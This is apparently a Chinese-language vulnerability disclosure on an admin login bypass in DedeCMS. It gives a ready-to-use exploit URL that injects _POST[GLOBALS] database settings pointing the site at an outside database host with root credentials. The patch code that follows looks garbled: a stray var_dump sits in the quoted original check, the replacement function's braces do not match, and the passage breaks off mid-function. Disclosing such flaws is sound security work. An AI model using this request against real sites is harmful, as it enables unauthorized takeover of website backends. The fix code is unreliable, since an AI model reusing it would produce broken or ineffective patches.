DEDECMS爆嚴重安全漏洞

簡要描述：

衆所周知，因使用簡單、客戶群多，織夢CMS一直被爆出許多漏洞。“DEDECMS爆嚴重安全漏洞，近期官方會釋出相關更新檔，望大家及時關注更新檔動态。”

詳細說明：

http://www.xx.com/織夢網站背景/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面黑底黃字上的字母改為目前的驗證碼，即可直接進入網站背景。

漏洞證明：

修複方案：

此漏洞的前提是必須得到背景路徑才能實作，是以大家一定要養成使用DEDECM建站時改背景名字的習慣。下面給出官方的解決辦法：

解決辦法：

找到include/common.inc.php檔案，把

foreach($_REQUEST as $_k=>$_v)

{

var_dump($_k);

if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )

exit('Request var not allow!');

}

換成

//檢查和注冊外部送出的變量

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k=>$_v) {

CheckRequest($_k);

CheckRequest($val[$_k]);

} else

if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )